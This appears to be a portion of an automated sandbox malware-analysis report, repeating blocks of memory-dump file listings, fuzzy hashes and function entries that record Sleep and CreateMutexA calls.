Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c0b81d57fc2321a838e302402de79129ab14e71245823b44a3b6d9ad8d5246ac
Instruction ID: 70f82a343bdcda29689f9245aa3790a10d47508718ce5f136d2cb9a81e769535
Opcode Fuzzy Hash: c0b81d57fc2321a838e302402de79129ab14e71245823b44a3b6d9ad8d5246ac
Instruction Fuzzy Hash: 73316831B04105DBEB089B78CD89BACB776EF85320F308219E018E72D5DB769981AB52

Function 00F6A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: bd9f07eaba9f00de98e6d3f00e5ddde02fa6568e15f0b89c7cb8906b720dd4c9
Instruction ID: 59b4b24cafbfbf6d4698dd5b28da9f4a6a037879097968697c68ba7f874ec271
Opcode Fuzzy Hash: bd9f07eaba9f00de98e6d3f00e5ddde02fa6568e15f0b89c7cb8906b720dd4c9
Instruction Fuzzy Hash: 2D311831B001059BEB189B78CD85B9DB772DF86314F348219E014E72D5DB769981AF13

Function 00F6A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f6408ac27c5d806c416986a1a4296031e307947e91c615f4769791cc1ca95343
Instruction ID: 7b20673079421e0a000665965c0836482849bbb12aa86b51873c36c51f42209f
Opcode Fuzzy Hash: f6408ac27c5d806c416986a1a4296031e307947e91c615f4769791cc1ca95343
Instruction Fuzzy Hash: 71311831B40145DFEB089BB8DD89B5DB772EF86310F348219E014E72D5D77A9981AF12

Function 00F6A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 700f4ab8befe83eab950d767f789fbb454742cb0627b8d4b5c43a8042b2e6903
Instruction ID: f65dc00b35d5848d3f299939762b4c183b83994d53f53275cefbe3fb175cfd04
Opcode Fuzzy Hash: 700f4ab8befe83eab950d767f789fbb454742cb0627b8d4b5c43a8042b2e6903
Instruction Fuzzy Hash: CB312831B001059BEB08DBB8DD89BADB772EFC1324F348219E014E72D5DB799981AB53

Function 00F6A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9519f025eb3f96da933271adeadd8ac19cd42a0b7e7ec27cc30c55eb71e98260
Instruction ID: e60a02d09f6a04b592814e461d7605a6474bfac2f91c459f18f2ab0d09ac1b07
Opcode Fuzzy Hash: 9519f025eb3f96da933271adeadd8ac19cd42a0b7e7ec27cc30c55eb71e98260
Instruction Fuzzy Hash: 72311831A001059BEB08DBB8DD89B6DB762EFC5324F348219E015E72D6DB399981AF13

Function 00F6A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
